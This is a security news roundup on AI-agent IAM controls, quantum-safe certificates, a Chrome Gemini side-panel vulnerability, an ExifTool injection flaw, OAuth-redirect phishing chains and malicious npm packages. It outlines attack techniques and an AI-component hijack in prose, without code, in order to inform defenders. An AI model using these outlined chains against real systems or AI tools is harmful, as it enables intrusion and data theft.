AI Agent Controls, Quantum-Safe HTTPS, and Evolving Threats

As organizations operationalize AI and retool networks, AWS introduced standardized IAM context keys to govern agentic access to cloud resources. In parallel, the Chrome team outlined an overhaul of web certificates toward Merkle Tree Certificates to enable quantum‑resistant HTTPS without heavy performance costs, as reported by The Hacker News. Together these moves concentrate on stronger boundaries, cleaner audit trails, and compatibility with existing deployments.

Governing AI Agents and Programmable Networks

AWS is standardizing how AI agents act on behalf of customers by adding two IAM context keys for its managed Model Context Protocol servers: aws:ViaAWSMCPService indicates requests routed through an AWS‑managed MCP, and aws:CalledViaAWSMCP holds the MCP service principal. Administrators can reference these keys in IAM and SCP policies to enforce differentiated controls—for example denying deletes when traffic originates from an MCP, or allowing EKS operations only via the EKS MCP server. AWS also plans to simplify public endpoint authorization so MCP servers add the new context while downstream services authorize with existing SigV4 credentials, removing separate MCP‑specific actions. For regulated environments, planned VPC endpoint support would keep MCP traffic private and enable layered checks (network plus service policies) with CloudTrail auditability. The guidance emphasizes least‑privilege starts, monitoring agent behavior in CloudTrail, and iterative policy refinement to balance function and risk.

On the network edge, Cloudflare is pushing beyond configuration APIs to inline programmability: administrators can run Workers as part of policy evaluation to call external risk engines, inject identity‑aware headers, or route traffic with custom logic in milliseconds, all on the same global network that powers its SASE stack. The company positions this as turning bespoke integrations into durable capabilities rather than professional‑services projects, and it plans managed and custom Gateway actions through 2026 to formalize the model. Details are in Cloudflare and the onboarding acceleration project Project Helix, which codifies best‑practice Zero Trust templates to eliminate blank‑slate deployments and get advanced controls—TLS inspection, DLP, AV scanning, device posture, RBI, and SaaS tenant restrictions—into production within minutes.

In telecom, Google Cloud described an agentic path to autonomous networks at MWC Barcelona, built on a temporal network digital twin, a unified graph layer (Spanner Graph and BigQuery), and integrated ML via Vertex AI. Operators can train GNNs on twin data, use Spanner’s ML.PREDICT to anticipate failure propagation, and act before subscribers are impacted. Open‑sourced pipelines, proof‑of‑value agents for governance and remediation, and ecosystem pilots aim to shorten time‑to‑value for CSPs by collapsing silos and enabling real‑time alarm correlation, historical state queries, and predictive modeling.

Quantum‑Ready PKI and Browser Safeguards

The Chrome team’s move toward Merkle Tree Certificates (MTCs) replaces large, per‑certificate signatures with compact inclusion proofs anchored by a single CA‑signed tree head. That design cuts authentication data exchanged in TLS to the minimum and bakes transparency into issuance, preserving low latency while supporting stronger, post‑quantum algorithms. Google is testing MTCs with Cloudflare and outlined a phased path, including onboarding criteria for a Chrome Quantum‑resistant Root Store. For operators, the appeal is efficiency and a clearer governance model without sacrificing web performance.

Separately, researchers at Palo Alto Networks uncovered CVE‑2026‑0628 in Chrome’s Gemini Live side panel that let extensions using declarativeNetRequests intercept and modify the app inside a privileged browser component. Exploitation enabled access to camera and microphone, local files, screenshots, and phishing content within trusted UI. Google reproduced the issue and shipped a fix in early January 2026. The advisory situates the flaw within broader agentic‑browser risks where multimodal access expands the attack surface; details are in Unit 42. The immediate takeaway: keep browsers updated and scrutinize extension permissions even when declared scopes appear limited.

Kaspersky reported CVE‑2026‑3102 in ExifTool on macOS, where crafted metadata (for example, DateTimeOriginal with embedded shell commands) can trigger code execution when ExifTool runs with the -n/--printConv flag. Because ExifTool is frequently embedded in photo apps and automation, unattended processing of untrusted images can compromise hosts. The maintainer released ExifTool 13.50 to remediate the issue; organizations should update bundled copies, isolate media pipelines, and restrict network/storage access around processing nodes. Full guidance is in Kaspersky.

Abuse of Trust Flows and Developer Ecosystems

Microsoft detailed phishing operations exploiting legitimate OAuth redirection behavior to bypass email and browser defenses. Attackers sent authorization links (via email, PDFs, calendar invites) that initiated silent probes with parameters like prompt=none and invalid scopes; standards‑compliant error handling then redirected to attacker‑controlled URIs, delivering phishing pages, proxy frameworks, or ZIP payloads. Chains used HTML smuggling, .LNKs launching PowerShell, and DLL side‑loading to establish C2. Microsoft Entra disabled malicious apps and Defender surfaced detections across email, identity, and endpoint. Recommended mitigations: govern OAuth apps and consent, enforce Conditional Access, enable XDR correlation, and hunt for auth URLs with silent prompts, invalid scopes, or state values encoding emails. See Microsoft for indicators and hunting tips. Why it matters: adversaries are increasingly turning protocol edges and trust relationships into delivery paths as credential theft becomes harder.

In the software supply chain, researchers tied a wave of 26 malicious npm packages to North Korean actors, who used install‑time scripts and character‑level steganography in public Pastebin pastes to assemble C2 domains. Staging leveraged Vercel deployments and delivered a cross‑platform RAT with modules for persistence via VS Code, keylogging, clipboard theft, browser and wallet credential harvesting (including macOS iCloud Keychain), filesystem discovery, targeted file exfiltration, Git/.ssh theft, and WebSocket‑based control. The campaign shows refined evasion using legitimate clouds and multi‑stage loaders. Developers should audit install scripts, remove the identified packages, and tighten review processes for typosquats and post‑install behavior. Coverage appears in The Hacker News.

Regional Escalation and Service Disruption

Following coordinated Israeli–US strikes on Iranian targets, reporting points to a surge in cyber activity, with sources citing Iran’s internet connectivity dropping to roughly 4% of normal and a flood of DDoS, defacements, and unverified breach claims attributed to multiple hacktivist and aligned groups. The UK’s NCSC assessed no immediate change to the direct threat to the UK but urged organizations with operations or supply‑chain exposure in the region to review posture. Recommended steps include heightened monitoring and logging, enforcing MFA, verified offline backups, and readiness checks for critical infrastructure contingency plans. Summary and context are in Infosecurity. Why it matters: geopolitical events can amplify indirect risk through third‑party and regional dependencies.

Anthropic confirmed a global service disruption for its Claude AI across web, mobile, and API, reporting elevated errors and ongoing investigation. The outage affects production workflows and conversational interfaces relying on real‑time responses. Teams should monitor error rates, implement exponential backoff and retries, consider temporary rate‑limits or cached responses, and evaluate alternate models where continuity is critical, while tracking official status updates. Coverage is available via BleepingComputer.